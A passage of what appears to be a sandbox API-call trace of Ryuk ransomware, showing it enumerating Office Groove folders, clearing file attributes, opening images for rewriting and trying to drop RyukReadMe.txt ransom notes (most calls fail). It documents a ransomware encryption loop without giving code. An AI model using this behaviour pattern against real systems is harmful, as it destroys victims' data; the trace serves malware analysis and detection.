returned 1 [0136.941] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\WSSFilesToolHomePageBackground.jpg", dwFileAttributes=0x80) returned 0 [0136.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\WSSFilesToolHomePageBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\documentshare\\wssfilestoolhomepagebackground.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.941] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.941] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.941] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.941] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.942] SetLastError (dwErrCode=0x0) [0136.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\documentshare\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.942] GetLastError () returned 0x5 [0136.942] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.942] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.942] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.942] SetLastError (dwErrCode=0x0) [0136.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.942] GetLastError () returned 0x5 [0136.942] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.942] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.942] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.943] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.943] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.943] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\ActiveTabImage.jpg", dwFileAttributes=0x80) returned 0 [0136.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\ActiveTabImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\activetabimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.944] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.944] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.944] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.944] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\ActiveTabImageMask.bmp", dwFileAttributes=0x80) returned 0 [0136.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\ActiveTabImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\activetabimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.944] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.944] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.945] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.945] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\BodyPaneBackground.jpg", dwFileAttributes=0x80) returned 0 [0136.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\BodyPaneBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\bodypanebackground.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.945] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.945] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.945] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.945] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImage.jpg", dwFileAttributes=0x80) returned 0 [0136.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.946] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.946] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.946] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.946] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImageMask.bmp", dwFileAttributes=0x80) returned 0 [0136.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.946] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.946] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.946] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.946] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.947] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.947] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.947] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.948] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.948] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.948] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.948] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.948] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.949] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.949] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.949] SetLastError (dwErrCode=0x0) [0136.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.952] GetLastError () returned 0x5 [0136.952] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.952] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.952] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.952] SetLastError (dwErrCode=0x0) [0136.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.952] GetLastError () returned 0x5 [0136.952] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.952] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.952] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.954] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.955] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.955] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.955] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\AddToViewArrow.jpg", dwFileAttributes=0x80) returned 0 [0136.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\AddToViewArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\addtoviewarrow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.956] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.956] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.956] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.956] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\AddToViewArrowMask.bmp", dwFileAttributes=0x80) returned 0 [0136.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\AddToViewArrowMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\addtoviewarrowmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.957] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.957] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.957] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.957] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\attention.gif", dwFileAttributes=0x80) returned 0 [0136.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\attention.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\attention.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.958] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.958] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.958] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.958] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.958] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\BG_ADOBE.GIF", dwFileAttributes=0x80) returned 0 [0136.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\BG_ADOBE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_adobe.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.958] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.958] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.958] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.958] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.959] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Casual.gif", dwFileAttributes=0x80) returned 0 [0136.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Casual.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_casual.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.959] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.959] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.959] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.960] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.960] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Country.gif", dwFileAttributes=0x80) returned 0 [0136.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Country.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_country.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.960] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.960] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.960] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.960] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.960] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Earthy.gif", dwFileAttributes=0x80) returned 0 [0136.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Earthy.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_earthy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.961] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.961] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.961] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.961] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.961] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_FormsHomePage.gif", dwFileAttributes=0x80) returned 0 [0136.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_FormsHomePage.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_formshomepage.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.962] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.962] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.962] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.962] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_FormsHomePageBlank.gif", dwFileAttributes=0x80) returned 0 [0136.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_FormsHomePageBlank.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_formshomepageblank.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.963] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.963] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.963] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.963] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_GreenTea.gif", dwFileAttributes=0x80) returned 0 [0136.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_GreenTea.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_greentea.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.964] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.964] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.964] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.964] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.965] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Groove.gif", dwFileAttributes=0x80) returned 0 [0136.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Groove.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_groove.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.965] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.965] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.965] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.965] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.965] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_LightSpirit.gif", dwFileAttributes=0x80) returned 0 [0136.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_LightSpirit.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_lightspirit.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.966] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.966] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.966] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.966] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_OliveGreen.gif", dwFileAttributes=0x80) returned 0 [0136.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_OliveGreen.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_olivegreen.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.966] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.966] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.966] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.966] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Premium.gif", dwFileAttributes=0x80) returned 0 [0136.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Premium.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_premium.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.967] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.967] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.967] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.967] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_SlateBlue.gif", dwFileAttributes=0x80) returned 0 [0136.968] CreateFileW 